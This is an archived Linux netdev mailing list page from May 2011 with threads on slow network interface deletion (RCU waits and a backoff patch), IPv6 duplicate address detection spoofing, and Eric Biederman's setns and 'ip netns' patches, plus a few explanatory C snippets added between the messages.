Netdev List


* Re: Scalability of interface creation and deletion
From: Eric Dumazet @ 2011-05-07 15:54 UTC
  To: Alex Bligh; +Cc: netdev
In-Reply-To: <0F4A638C2A523577CDBC295E@Ximines.local>

On Saturday 07 May 2011 at 16:26 +0100, Alex Bligh wrote:
> Well, I patched it (patch attached for what it's worth) and it made
> no difference in this case. I would suggest however that it might
> be the right thing to do anyway.
> 

As I said, this code should not be entered in normal situations.

You are not the first to suggest a change, but it won't help you at all.




> On the current 8 core box I am testing, I see 280ms per interface
> delete **even with only 10 interfaces**. I see 260ms with one
> interface. I know doing lots of rcu sync stuff can be slow, but
> 260ms to remove one veth pair sounds like more than rcu sync going
> on. It sounds like a sleep (though I may not have found the
> right one). I see no CPU load.
> 
> Equally, with one interface (remember I'm doing this in unshare -n
> so there is only a loopback interface there), this bit surely
> can't be sysfs.
> 

synchronize_rcu() calls do not consume CPU; they just _wait_ for an
RCU grace period to elapse.
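
The difference between waiting and burning CPU can be seen from userspace. The following is only an analogy, not kernel code: it uses nanosleep() as a stand-in for a blocking wait and compares wall-clock time with the CPU time charged to the process. The names wait_cost, diff_ms and measure_wait are made up for this sketch.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <time.h>

struct wait_cost {
	double wall_ms;	/* elapsed wall-clock time */
	double cpu_ms;	/* CPU time charged to this process */
};

/* Difference b - a in milliseconds. */
static double diff_ms(struct timespec a, struct timespec b)
{
	return (b.tv_sec - a.tv_sec) * 1e3 + (b.tv_nsec - a.tv_nsec) / 1e6;
}

/* Block for wait_ms and report how much wall time and CPU time passed.
 * nanosleep() is an assumption standing in for any blocking wait. */
static struct wait_cost measure_wait(long wait_ms)
{
	struct timespec req, w0, w1, c0, c1;
	struct wait_cost cost;

	assert(wait_ms >= 0);
	req.tv_sec = wait_ms / 1000;
	req.tv_nsec = (wait_ms % 1000) * 1000000L;

	clock_gettime(CLOCK_MONOTONIC, &w0);
	clock_gettime(CLOCK_PROCESS_CPUTIME_ID, &c0);
	nanosleep(&req, NULL);
	clock_gettime(CLOCK_PROCESS_CPUTIME_ID, &c1);
	clock_gettime(CLOCK_MONOTONIC, &w1);

	cost.wall_ms = diff_ms(w0, w1);
	cost.cpu_ms = diff_ms(c0, c1);
	return cost;
}
```

Calling measure_wait(260) should report a wall time of at least 260 ms and a much smaller CPU time, which is the same shape as a slow interface delete that shows no CPU load.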

I suggest you read Documentation/RCU files if you really want to :)

If you want to check how expensive it is, it's quite easy:
add a trace in synchronize_net()

diff --git a/net/core/dev.c b/net/core/dev.c
index 856b6ee..70f3c46 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -5915,8 +5915,10 @@ EXPORT_SYMBOL(free_netdev);
  */
 void synchronize_net(void)
 {
+	pr_err("begin synchronize_net()\n");
 	might_sleep();
 	synchronize_rcu();
+	pr_err("end synchronize_net()\n");
 }
 EXPORT_SYMBOL(synchronize_net);
 







* Re: Scalability of interface creation and deletion
From: Alex Bligh @ 2011-05-07 15:26 UTC
  To: Eric Dumazet; +Cc: netdev, Alex Bligh
In-Reply-To: <1304770926.2821.1157.camel@edumazet-laptop>

Eric,

>> 1. Interface creation slows down hugely with more interfaces
>
> sysfs is the problem, a very well known one.
> (sysfs_refresh_inode(),

Thanks

>> 2. Interface deletion is normally much slower than interface creation
>>
>> strace -T -ttt on the "ip" command used to do this does not show the
>> delay where I thought it would be - cataloguing the existing interfaces.
>> Instead, it's the final send() to the netlink socket which does the
>> relevant action which appears to be slow, for both addition and deletion.
>> Adding the last interface takes 200ms in that syscall, the first is
>> quick (symptomatic of a slowdown); for deletion the last send syscall is
>> quick.
>
>> I am having difficulty seeing what might be the issue in interface
>> creation. Any ideas?
>>
>
> Actually a lot; just run
>
> git log net/core/dev.c
>
> and you'll see many commits to make this faster.

OK. I am up to 2.6.38.2 and see no improvement by then. I will
try something bleeding edge in a bit.

>> I am guessing that this is going to do the msleep 50% of the time,
>> explaining 125ms of the observed time. How would people react to
>> exponential backoff instead (untested):
>>
>> 	int backoff = 10;
>>         refcnt = netdev_refcnt_read(dev);
>>
>>         while (refcnt != 0) {
>>                 ...
>>                 msleep(backoff);
>>                 if ((backoff *= 2) > 250)
>>                   backoff = 250;
>> 		
>>                 refcnt = netdev_refcnt_read(dev);
>> 		....
>>         }
>>
>>
>
> Welcome to the club. This has been discussed on netdev for many
> years. A lot of work has been done to make it better.

Well, I patched it (patch attached for what it's worth) and it made
no difference in this case. I would suggest however that it might
be the right thing to do anyway.
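
As a rough illustration of the backoff schedule in the patch (start at 5 ms, double each time, cap at 250 ms), the arithmetic can be checked in plain userspace C. The helper names next_backoff_ms and total_sleep_ms are hypothetical and do not exist in the kernel; this only models the delays, not netdev_wait_allrefs() itself.

```c
#include <assert.h>

/* Next delay: double the current one, but never exceed cap_ms. */
static int next_backoff_ms(int cur_ms, int cap_ms)
{
	assert(cur_ms > 0 && cap_ms > 0);
	cur_ms *= 2;
	return cur_ms > cap_ms ? cap_ms : cur_ms;
}

/* Total time slept after `polls` sleeps, starting from start_ms. */
static int total_sleep_ms(int start_ms, int cap_ms, int polls)
{
	int total = 0;
	int delay = start_ms;

	for (int i = 0; i < polls; i++) {
		total += delay;
		delay = next_backoff_ms(delay, cap_ms);
	}
	return total;
}
```

With these numbers the delays run 5, 10, 20, 40, 80, 160, 250, 250, ... so a reference that drops quickly costs 5 ms instead of a fixed 250 ms, and six polls add up to 315 ms. As noted above, this did not change the timings measured here.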

> Interface deletion needs several RCU sync calls, and they are very
> expensive. This is the price to pay for a lockless network stack in
> fast paths.

On the current 8 core box I am testing, I see 280ms per interface
delete **even with only 10 interfaces**. I see 260ms with one
interface. I know doing lots of rcu sync stuff can be slow, but
260ms to remove one veth pair sounds like more than rcu sync going
on. It sounds like a sleep (though I may not have found the
right one). I see no CPU load.

Equally, with one interface (remember I'm doing this in unshare -n
so there is only a loopback interface there), this bit surely
can't be sysfs.

-- 
Alex Bligh

Signed-off-by: Alex Bligh <alex@alex.org.uk>
diff --git a/net/core/dev.c b/net/core/dev.c
index 6561021..f55c95c 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -5429,6 +5429,7 @@ static void netdev_wait_allrefs(struct net_device *dev)
 {
        unsigned long rebroadcast_time, warning_time;
        int refcnt;
+       int backoff = 5;

        linkwatch_forget_dev(dev);

@@ -5460,7 +5461,9 @@ static void netdev_wait_allrefs(struct net_device *dev)
                        rebroadcast_time = jiffies;
                }

-               msleep(250);
+               msleep(backoff);
+               if ((backoff *= 2) > 250)
+                 backoff = 250;

                refcnt = netdev_refcnt_read(dev);






* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Gervais Arthur @ 2011-05-07 14:35 UTC
  To: Eric Dumazet; +Cc: Jan Ceuleers, netdev
In-Reply-To: <1304777182.2821.1262.camel@edumazet-laptop>

On 05/07/2011 04:06 PM, Eric Dumazet wrote:
 > On Saturday 07 May 2011 at 15:54 +0200, Gervais Arthur wrote:
 >
 >> Why would the victim itself claim to already have the IPv6 address?
 >>
 >
 > Why should it care? Please point me to the RFC saying it's illegal to send
 > or receive a frame with SRC_MAC == DST_MAC
 >

There is no RFC statement saying that this is illegal. But we are not 
only talking about the Ethernet layer. There is also the ICMPv6 layer.

But I cannot find anything about this in the IPv6 RFCs either.



* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Mikael Abrahamsson @ 2011-05-07 14:21 UTC
  To: Gervais Arthur; +Cc: Eric Dumazet, Jan Ceuleers, netdev
In-Reply-To: <842648e0f4a8c6f7cd8a47cd6916a939@mail.insa-lyon.fr>

On Sat, 7 May 2011, Gervais Arthur wrote:

> If the network administrator is using some IDS like NDPMon 
> (http://ndpmon.sourceforge.net/) to detect DAD DoS attacks, and the 
> attacker changes the MAC address like I described, it will not detect 
> the DAD DoS attack anymore (because the victim itself already claims 
> to have the IPv6 address).

If the network admin allows anyone to source any packet then they're 
already screwed. Networks need IETF SAVI-WG functionality to secure their 
network; if spoofing is allowed it's already too late.

The earlier network admins realise this and stop just trying to monitor 
the problem, the better.

-- 
Mikael Abrahamsson    email: swmike@swm.pp.se


* Re: [PATCH 0/7] Network namespace manipulation with file descriptors
From: Eric W. Biederman @ 2011-05-07 14:18 UTC
  To: Alex Bligh
  Cc: linux-arch, netdev, linux-kernel, Linux Containers, linux-fsdevel
In-Reply-To: <3A54AB469A0294933EAC2257@nimrod.local>

Alex Bligh <alex@alex.org.uk> writes:

> --On 6 May 2011 19:23:29 -0700 "Eric W. Biederman" <ebiederm@xmission.com>
> wrote:
>
>> This patchset addresses the user interface limitations by introducing
>> proc files you can open to get file descriptors that keep alive and
>> refer to a task's namespaces.  Those file descriptors can be passed
>> to the new setns system call or the NET_NS_FD argument in netlink
>> messages.
>
> This is conceptually very interesting. I am one of those people you
> describe with a routing daemon (or more accurately a wrapper around
> existing daemons) that does the unshare() and keeps the network
> alive. It also has a control socket etc.
>
> You say:
>> This addresses three specific problems that can make namespaces hard to
>> work with.
>> - Namespaces require a dedicated process to pin them in memory.
>> - It is not possible to use a namespace unless you are the child
>>   of the original creator.
>> - Namespaces don't have names that userspace can use to talk about
>>   them.
>
> At least for me, the best way to solve the second blob would be to
> be able to unshare to an existing namespace. That way I would be able
> to run a daemon (without modification) in a pre-existing namespace.
> The user interface here would just be an option to 'unshare'. I
> don't think your patch allows this, does it?  Right now I'm effectively
> doing that by causing the pid concerned to fork() and do my bidding,
> but that is far from perfect.

You are essentially describing my setns system call.
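
A minimal sketch of what "unsharing into an existing namespace" might look like from userspace, assuming a kernel that carries this patchset and exposes /proc/<pid>/ns/net. The function name join_netns is hypothetical, the CLONE_NEWNET fallback value is the one used in the iproute2 patch below, and the raw syscall() form is used because a libc wrapper may not be available. The caller needs sufficient privilege for the switch to succeed.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef CLONE_NEWNET
#define CLONE_NEWNET 0x40000000	/* same fallback as the iproute2 patch */
#endif

/* Move the calling task into the network namespace that `path` refers to,
 * for example /proc/<pid>/ns/net.  Returns 0 on success, -1 on failure. */
static int join_netns(const char *path)
{
	int fd, ret;

	assert(path != NULL);
	fd = open(path, O_RDONLY);
	if (fd < 0)
		return -1;

	ret = (int)syscall(SYS_setns, fd, CLONE_NEWNET);
	close(fd);	/* the task keeps the namespace alive once it has joined */
	return ret < 0 ? -1 : 0;
}
```

A wrapper would call join_netns() and then exec the unmodified daemon, which is the same pattern "ip netns exec" follows in the patch below.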

> As a secondary issue, even without your patch, it would be really
> useful to be able to read from userspace the current network namespace.
> (i.e. the pid concerned, or 1 if not unshared). I would like to
> simply modify a routing daemon's init script so it doesn't start
> if in the host, e.g. at the top:
>  [ `cat /proc/.../networknamespace` -eq 1 ] && exit 0

You can read a process's network namespace by opening
/proc/<pid>/ns/net.  Unfortunately comparing the network
namespaces for identity is another matter.  You will probably
be better off simply forcing the routing daemon to start
in the desired network namespace in its initscript.

For purposes of clarity please have a look at my work in
progress patch for iproute2.  This demonstrates how I expect
userspace to work in a multi-network namespace world.

Eric


From f773bd66c2e31e1ac55b65ce5bc2c17f8845ce5c Mon Sep 17 00:00:00 2001
From: "Eric W. Biederman" <ebiederm@xmission.com>
Date: Fri, 6 May 2011 00:01:45 -0700
Subject: [PATCH] iproute2:  Add processless network namespace support.

The goal of this code change is to implement a mechanism
such that it is simple to work with a kernel that is
using multiple network namespaces at once.

This comes in handy for interacting with vpns where
there may be rfc1918 address overlaps, and different
policies, default routes, name servers and the like.

Configuration specific to a network namespace that
would ordinarily be stored under /etc/ is stored under
/etc/netns/<name>.  For example if the dns server
configuration is different for your vpn you would
create a file /etc/netns/myvpn/resolv.conf.

File descriptors that can be used to manipulate a
network namespace can be created by opening
/var/run/netns/<NAME>.
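
The name lookup can be sketched as follows. It mirrors what get_netns_fd() in this patch does before calling open(): a name containing a slash is used as a path as-is, anything else is looked up under /var/run/netns. The helper name netns_name_to_path and its return convention are made up for illustration.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

#define NETNS_RUN_DIR "/var/run/netns"

/* Write the path for `name` into buf.  Returns 0 on success, or -1 if
 * the result does not fit in `size` bytes. */
static int netns_name_to_path(const char *name, char *buf, size_t size)
{
	int n;

	assert(name != NULL && buf != NULL && size > 0);
	if (strchr(name, '/'))
		n = snprintf(buf, size, "%s", name);	/* already a path */
	else
		n = snprintf(buf, size, "%s/%s", NETNS_RUN_DIR, name);

	return (n < 0 || (size_t)n >= size) ? -1 : 0;
}
```

So "myvpn" becomes /var/run/netns/myvpn, while something like /proc/1/ns/net is passed through unchanged.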

This adds the following commands to iproute.
ip netns add NAME
ip netns delete NAME
ip netns monitor
ip netns list
ip netns exec NAME cmd ....
ip link set DEV netns NAME

ip netns exec exists to cater to the vast majority of programs
that only know how to operate in a single network namespace.
ip netns exec changes the default network namespace, creates
a new mount namespace, remounts /sys and bind mounts netns
specific configuration files to their standard locations.

Signed-off-by: Eric W. Biederman <ebiederm@xmission.com>
---
 include/linux/if_link.h |    1 +
 ip/Makefile             |    2 +-
 ip/ip.c                 |    4 +-
 ip/ip_common.h          |    2 +
 ip/iplink.c             |    8 +-
 ip/ipnetns.c            |  320 +++++++++++++++++++++++++++++++++++++++++++++++
 man/man8/ip.8           |   56 ++++++++
 7 files changed, 389 insertions(+), 4 deletions(-)
 create mode 100644 ip/ipnetns.c

diff --git a/include/linux/if_link.h b/include/linux/if_link.h
index e4a3a2d..304c44f 100644
--- a/include/linux/if_link.h
+++ b/include/linux/if_link.h
@@ -136,6 +136,7 @@ enum {
 	IFLA_PORT_SELF,
 	IFLA_AF_SPEC,
 	IFLA_GROUP,		/* Group the device belongs to */
+	IFLA_NET_NS_FD,
 	__IFLA_MAX
 };
 
diff --git a/ip/Makefile b/ip/Makefile
index 6054e8a..2ee4e7c 100644
--- a/ip/Makefile
+++ b/ip/Makefile
@@ -1,4 +1,4 @@
-IPOBJ=ip.o ipaddress.o ipaddrlabel.o iproute.o iprule.o \
+IPOBJ=ip.o ipaddress.o ipaddrlabel.o iproute.o iprule.o ipnetns.o \
     rtm_map.o iptunnel.o ip6tunnel.o tunnel.o ipneigh.o ipntable.o iplink.o \
     ipmaddr.o ipmonitor.o ipmroute.o ipprefix.o iptuntap.o \
     ipxfrm.o xfrm_state.o xfrm_policy.o xfrm_monitor.o \
diff --git a/ip/ip.c b/ip/ip.c
index b127d57..7f0c468 100644
--- a/ip/ip.c
+++ b/ip/ip.c
@@ -44,7 +44,8 @@ static void usage(void)
 "Usage: ip [ OPTIONS ] OBJECT { COMMAND | help }\n"
 "       ip [ -force ] -batch filename\n"
 "where  OBJECT := { link | addr | addrlabel | route | rule | neigh | ntable |\n"
-"                   tunnel | tuntap | maddr | mroute | mrule | monitor | xfrm }\n"
+"                   tunnel | tuntap | maddr | mroute | mrule | monitor | xfrm |\n"
+"                   netns }\n"
 "       OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[esolve] |\n"
 "                    -f[amily] { inet | inet6 | ipx | dnet | link } |\n"
 "                    -l[oops] { maximum-addr-flush-attempts } |\n"
@@ -80,6 +81,7 @@ static const struct cmd {
 	{ "xfrm",	do_xfrm },
 	{ "mroute",	do_multiroute },
 	{ "mrule",	do_multirule },
+	{ "netns",	do_netns },
 	{ "help",	do_help },
 	{ 0 }
 };
diff --git a/ip/ip_common.h b/ip/ip_common.h
index a114186..5e5fb76 100644
--- a/ip/ip_common.h
+++ b/ip/ip_common.h
@@ -38,6 +38,7 @@ extern int do_ipmonitor(int argc, char **argv);
 extern int do_multiaddr(int argc, char **argv);
 extern int do_multiroute(int argc, char **argv);
 extern int do_multirule(int argc, char **argv);
+extern int do_netns(int argc, char **argv);
 extern int do_xfrm(int argc, char **argv);
 
 static inline int rtm_get_table(struct rtmsg *r, struct rtattr **tb)
@@ -64,6 +65,7 @@ struct link_util
 };
 
 struct link_util *get_link_kind(const char *kind);
+int get_netns_fd(const char *name);
 
 #ifndef	INFINITY_LIFE_TIME
 #define     INFINITY_LIFE_TIME      0xFFFFFFFFU
diff --git a/ip/iplink.c b/ip/iplink.c
index 48c0254..e5325a6 100644
--- a/ip/iplink.c
+++ b/ip/iplink.c
@@ -67,6 +67,7 @@ void iplink_usage(void)
 	fprintf(stderr, "	                  [ broadcast LLADDR ]\n");
 	fprintf(stderr, "	                  [ mtu MTU ]\n");
 	fprintf(stderr, "	                  [ netns PID ]\n");
+	fprintf(stderr, "	                  [ netns NAME ]\n");
 	fprintf(stderr, "			  [ alias NAME ]\n");
 	fprintf(stderr, "	                  [ vf NUM [ mac LLADDR ]\n");
 	fprintf(stderr, "				   [ vlan VLANID [ qos VLAN-QOS ] ]\n");
@@ -304,9 +305,12 @@ int iplink_parse(int argc, char **argv, struct iplink_req *req,
                         NEXT_ARG();
                         if (netns != -1)
                                 duparg("netns", *argv);
-                        if (get_integer(&netns, *argv, 0))
+			if ((netns = get_netns_fd(*argv)) >= 0)
+				addattr_l(&req->n, sizeof(*req), IFLA_NET_NS_FD, &netns, 4);
+			else if (get_integer(&netns, *argv, 0) == 0)
+				addattr_l(&req->n, sizeof(*req), IFLA_NET_NS_PID, &netns, 4);
+			else
                                 invarg("Invalid \"netns\" value\n", *argv);
-                        addattr_l(&req->n, sizeof(*req), IFLA_NET_NS_PID, &netns, 4);
 		} else if (strcmp(*argv, "multicast") == 0) {
 			NEXT_ARG();
 			req->i.ifi_change |= IFF_MULTICAST;
diff --git a/ip/ipnetns.c b/ip/ipnetns.c
new file mode 100644
index 0000000..efb7fd2
--- /dev/null
+++ b/ip/ipnetns.c
@@ -0,0 +1,320 @@
+#define _ATFILE_SOURCE
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/inotify.h>
+#include <sys/mount.h>
+#include <sys/param.h>
+#include <stdio.h>
+#include <string.h>
+#include <sched.h>
+#include <fcntl.h>
+#include <dirent.h>
+#include <errno.h>
+#include <unistd.h>
+
+#include "utils.h"
+#include "ip_common.h"
+
+#define NETNS_RUN_DIR "/var/run/netns"
+#define NETNS_ETC_DIR "/etc/netns"
+
+#ifdef __x86_64__
+#define PRIVATE_SYS_setns 307
+#endif
+
+#ifdef __i386__
+#define PRIVATE_SYS_setns 345
+#endif
+
+#ifndef SYS_setns
+#define SYS_setns PRIVATE_SYS_setns
+#endif
+
+#ifndef CLONE_NEWNET
+#define CLONE_NEWNET 0x40000000	/* New network namespace (lo, device, names sockets, etc) */
+#endif
+
+#ifndef MNT_DETACH
+#define MNT_DETACH	0x00000002	/* Just detach from the tree */
+#endif /* MNT_DETACH */
+
+
+static int setns(int fd, int nstype)
+{
+	return syscall(SYS_setns, fd, nstype);
+}
+
+static int touch(const char *path, mode_t mode)
+{
+	int fd;
+	fd = open(path, O_RDONLY|O_CREAT, mode);
+	if (fd < 0)
+		return -1;
+	close(fd);
+	return 0;
+}
+
+static void usage(void) __attribute__((noreturn));
+
+static void usage(void)
+{
+	fprintf(stderr, "Usage: ip netns list\n");
+	fprintf(stderr, "       ip netns add NAME\n");
+	fprintf(stderr, "       ip netns delete NAME\n");
+	fprintf(stderr, "       ip netns exec NAME cmd ...\n");
+	fprintf(stderr, "       ip netns monitor\n");
+	exit(-1);
+}
+
+int get_netns_fd(const char *name)
+{
+	char pathbuf[MAXPATHLEN];
+	const char *path, *ptr;
+
+	path = name;
+	ptr = strchr(name, '/');
+	if (!ptr) {
+		snprintf(pathbuf, sizeof(pathbuf), "%s/%s",
+			NETNS_RUN_DIR, name );
+		path = pathbuf;
+	}
+	return open(path, O_RDONLY);
+}
+
+static int netns_list(int argc, char **argv)
+{
+	struct dirent *entry;
+	DIR *dir;
+
+	dir = opendir(NETNS_RUN_DIR);
+	if (!dir)
+		return 0;
+
+	while ((entry = readdir(dir)) != NULL) {
+		if (strcmp(entry->d_name, ".") == 0)
+			continue;
+		if (strcmp(entry->d_name, "..") == 0)
+			continue;
+		printf("%s\n", entry->d_name);
+	}
+	closedir(dir);
+	return 0;
+}
+
+static void bind_etc(const char *name)
+{
+	char etc_netns_path[MAXPATHLEN];
+	char netns_name[MAXPATHLEN];
+	char etc_name[MAXPATHLEN];
+	struct dirent *entry;
+	DIR *dir;
+
+	snprintf(etc_netns_path, sizeof(etc_netns_path), "%s/%s", NETNS_ETC_DIR, name);
+	dir = opendir(etc_netns_path);
+	if (!dir)
+		return;
+
+	while ((entry = readdir(dir)) != NULL) {
+		if (strcmp(entry->d_name, ".") == 0)
+			continue;
+		if (strcmp(entry->d_name, "..") == 0)
+			continue;
+		snprintf(netns_name, sizeof(netns_name), "%s/%s", etc_netns_path, entry->d_name);
+		snprintf(etc_name, sizeof(etc_name), "/etc/%s", entry->d_name);
+		if (mount(netns_name, etc_name, "none", MS_BIND, NULL) < 0) {
+			fprintf(stderr, "Bind %s -> %s failed: %s\n",
+				netns_name, etc_name, strerror(errno));
+		}
+	}
+	closedir(dir);
+}
+
+static int netns_exec(int argc, char **argv)
+{
+	/* Setup the proper environment for apps that are not netns
+	 * aware, and execute a program in that environment.
+	 */
+	const char *name, *cmd;
+	char net_path[MAXPATHLEN];
+	int netns;
+
+	if (argc < 1) {
+		fprintf(stderr, "No netns name specified\n");
+		return -1;
+	}
+	if (argc < 2) {
+		fprintf(stderr, "No cmd specified\n");
+		return -1;
+	}
+	name = argv[0];
+	cmd = argv[1];
+	snprintf(net_path, sizeof(net_path), "%s/%s", NETNS_RUN_DIR, name);
+	netns = open(net_path, O_RDONLY);
+	if (netns < 0) {
+		fprintf(stderr, "Cannot open network namespace: %s\n",
+			strerror(errno));
+		return -1;
+	}
+	if (setns(netns, CLONE_NEWNET) < 0) {
+		fprintf(stderr, "setting the network namespace failed: %s\n",
+			strerror(errno));
+		return -1;
+	}
+
+	if (unshare(CLONE_NEWNS) < 0) {
+		fprintf(stderr, "unshare failed: %s\n", strerror(errno));
+		return -1;
+	}
+	/* Mount a version of /sys that describes the network namespace */
+	if (umount2("/sys", MNT_DETACH) < 0) {
+		fprintf(stderr, "umount of /sys failed: %s\n", strerror(errno));
+		return -1;
+	}
+	if (mount(name, "/sys", "sysfs", 0, NULL) < 0) {
+		fprintf(stderr, "mount of /sys failed: %s\n",strerror(errno));
+		return -1;
+	}
+
+	/* Setup bind mounts for config files in /etc */
+	bind_etc(name);
+
+	if (execvp(cmd, argv + 1)  < 0)
+		fprintf(stderr, "exec of %s failed: %s\n",
+			cmd, strerror(errno));
+	exit(-1);
+}
+
+static int netns_delete(int argc, char **argv)
+{
+	const char *name;
+	char netns_path[MAXPATHLEN];
+
+	if (argc < 1) {
+		fprintf(stderr, "No netns name specified\n");
+		return -1;
+	}
+
+	name = argv[0];
+	snprintf(netns_path, sizeof(netns_path), "%s/%s", NETNS_RUN_DIR, name);
+	umount2(netns_path, MNT_DETACH);
+	if (unlink(netns_path) < 0) {
+		fprintf(stderr, "Cannot remove %s: %s\n",
+			netns_path, strerror(errno));
+		return -1;
+	}
+	return 0;
+}
+
+static int netns_add(int argc, char **argv)
+{
+	/* This function creates a new network namespace and
+	 * a new mount namespace and binds them into a well known
+	 * location in the filesystem based on the name provided.
+	 *
+	 * The mount namespace is created so that any necessary
+	 * userspace tweaks like remounting /sys, or bind mounting
+	 * a new /etc/resolv.conf can be shared between users.
+	 */
+	char netns_path[MAXPATHLEN];
+	const char *name;
+
+	if (argc < 1) {
+		fprintf(stderr, "No netns name specified\n");
+		return -1;
+	}
+	name = argv[0];
+
+	snprintf(netns_path, sizeof(netns_path), "%s/%s", NETNS_RUN_DIR, name);
+
+	/* Create the base netns directory if it doesn't exist */
+	mkdir(NETNS_RUN_DIR, S_IRWXU|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
+
+	/* Create the filesystem state */
+	if (touch(netns_path, 0) < 0) {
+		fprintf(stderr, "Could not create %s: %s\n",
+			netns_path, strerror(errno));
+		goto out_delete;
+	}
+	if (unshare(CLONE_NEWNET) < 0) {
+		fprintf(stderr, "Failed to create a new network namespace: %s\n",
+			strerror(errno));
+		goto out_delete;
+	}
+
+	/* Bind the netns last so I can watch for it */
+	if (mount("/proc/self/ns/net", netns_path, "none", MS_BIND, NULL) < 0) {
+		fprintf(stderr, "Bind /proc/self/ns/net -> %s failed: %s\n",
+			netns_path, strerror(errno));
+		goto out_delete;
+	}
+	return 0;
+out_delete:
+	netns_delete(argc, argv);
+	exit(-1);
+	return -1;
+}
+
+
+static int netns_monitor(int argc, char **argv)
+{
+	char buf[4096];
+	struct inotify_event *event;
+	int fd;
+	fd = inotify_init();
+	if (fd < 0) {
+		fprintf(stderr, "inotify_init failed: %s\n",
+			strerror(errno));
+		return -1;
+	}
+	if (inotify_add_watch(fd, NETNS_RUN_DIR, IN_CREATE | IN_DELETE) < 0) {
+		fprintf(stderr, "inotify_add_watch failed: %s\n",
+			strerror(errno));
+		return -1;
+	}
+	for(;;) {
+		ssize_t len = read(fd, buf, sizeof(buf));
+		if (len < 0) {
+			fprintf(stderr, "read failed: %s\n",
+				strerror(errno));
+			return -1;
+		}
+		for (event = (struct inotify_event *)buf;
+		     (char *)event < &buf[len];
+		     event = (struct inotify_event *)((char *)event + sizeof(*event) + event->len)) {
+			if (event->mask & IN_CREATE)
+				printf("add %s\n", event->name);
+			if (event->mask & IN_DELETE)
+				printf("delete %s\n", event->name);
+		}
+	}
+	return 0;
+}
+
+int do_netns(int argc, char **argv)
+{
+	if (argc < 1)
+		return netns_list(0, NULL);
+
+	if ((matches(*argv, "list") == 0) || (matches(*argv, "show") == 0) ||
+	    (matches(*argv, "lst") == 0))
+		return netns_list(argc-1, argv+1);
+
+	if (matches(*argv, "help") == 0)
+		usage();
+
+	if (matches(*argv, "add") == 0)
+		return netns_add(argc-1, argv+1);
+
+	if (matches(*argv, "delete") == 0)
+		return netns_delete(argc-1, argv+1);
+
+	if (matches(*argv, "exec") == 0)
+		return netns_exec(argc-1, argv+1);
+
+	if (matches(*argv, "monitor") == 0)
+		return netns_monitor(argc-1, argv+1);
+
+	fprintf(stderr, "Command \"%s\" is unknown, try \"ip netns help\".\n", *argv);
+	exit(-1);
+}
diff --git a/man/man8/ip.8 b/man/man8/ip.8
index c5248ef..1935dc5 100644
--- a/man/man8/ip.8
+++ b/man/man8/ip.8
@@ -85,6 +85,9 @@ ip \- show / manipulate routing, devices, policy routing and tunnels
 .B  netns
 .IR PID " |"
 .br
+.B  netns
+.IR NETNSNAME " |"
+.br
 .B alias
 .IR NAME  " |"
 .br
@@ -162,6 +165,17 @@ tentative " | " deprecated " | " dadfailed " | " temporary " ]"
 .BR "ip addrlabel" " { " list " | " flush " }"
 
 .ti -8
+.BR "ip netns" " { " list " | " monitor " } "
+
+.ti -8
+.BR "ip netns" " { " add " | " delete " } "
+.I NETNSNAME
+
+.ti -8
+.BR "ip netns exec "
+.I NETNSNAME command ...
+
+.ti -8
 .BR "ip route" " { "
 .BR list " | " flush " } "
 .I  SELECTOR
@@ -1006,6 +1020,11 @@ move the device to the network namespace associated with the process
 .IR "PID".
 
 .TP
+.BI netns " NETNSNAME"
+move the device to the network namespace associated with name
+.IR "NETNSNAME".
+
+.TP
 .BI alias " NAME"
 give the device a symbolic name for easy reference.
 
@@ -2470,6 +2489,43 @@ at any time.
 It prepends the history with the state snapshot dumped at the moment
 of starting.
 
+.SH ip netns - process network namespace management
+
+A network namespace is logically another copy of the network stack,
+with its own routes, firewall rules, and network devices.
+
+By convention a named network namespace is an object at
+.BR "/var/run/netns/" NAME
+that can be opened.  The file descriptor resulting from opening
+.BR "/var/run/netns/" NAME 
+refers to the specified network namespace.  Holding that file
+descriptor open keeps the network namespace alive.  The file
+descriptor can be used with the
+.B setns(2)
+system call to change the network namespace associated with a task.
+
+The convention for network namespace aware applications is to look
+for global network configuration files first in
+.BR "/etc/netns/" NAME "/"
+then in
+.BR "/etc/".
+For example, if you want a different version of
+.BR /etc/resolv.conf
+for a network namespace used to isolate your vpn you would name it
+.BR /etc/netns/myvpn/resolv.conf.
+
+.B ip netns exec
+automates handling of this configuration file convention for network
+namespace unaware applications, by creating a mount namespace and
+bind mounting all of the per network namespace configuration files into
+their traditional location in /etc.
+
+.SS ip netns list - show all of the named network namespaces
+.SS ip netns monitor - report when network namespace names are created and destroyed
+.SS ip netns add NAME - create a new named network namespace
+.SS ip netns delete NAME - delete the name of a network namespace
+.SS ip netns exec NAME cmd ... - Run cmd in the named network namespace
+
 .SH ip xfrm - setting xfrm
 xfrm is an IP framework, which can transform format of the datagrams,
 .br
-- 
1.7.5.1.217.g4e3aa



* Re: [PATCH 7/7] ns: Wire up the setns system call
From: Eric W. Biederman @ 2011-05-07 14:09 UTC
  To: Geert Uytterhoeven
  Cc: linux-arch, linux-kernel, netdev, linux-fsdevel, jamal,
	Daniel Lezcano, Linux Containers, Renato Westphal
In-Reply-To: <BANLkTi=G-uViB6=8bQ0dRGbw3Gg8V10CRw@mail.gmail.com>

Geert Uytterhoeven <geert@linux-m68k.org> writes:

> On Sat, May 7, 2011 at 04:25, Eric W. Biederman <ebiederm@xmission.com> wrote:
>>  arch/m68k/include/asm/unistd.h         |    3 ++-
>>  arch/m68k/kernel/syscalltable.S        |    1 +
>
> As the unified syscalltable for m68k/m68knommu is not yet in mainline
> (planned for 2.6.40), you should also add it to arch/m68k/kernel/entry_mm.S.
>
> Gr{oetje,eeting}s,

Like so?

From c06a03281d944ed36e2da02f5374ec6c650e4988 Mon Sep 17 00:00:00 2001
From: "Eric W. Biederman" <ebiederm@xmission.com>
Date: Sat, 7 May 2011 07:00:24 -0700
Subject: [PATCH] m68knommu: Wire up the setns system call

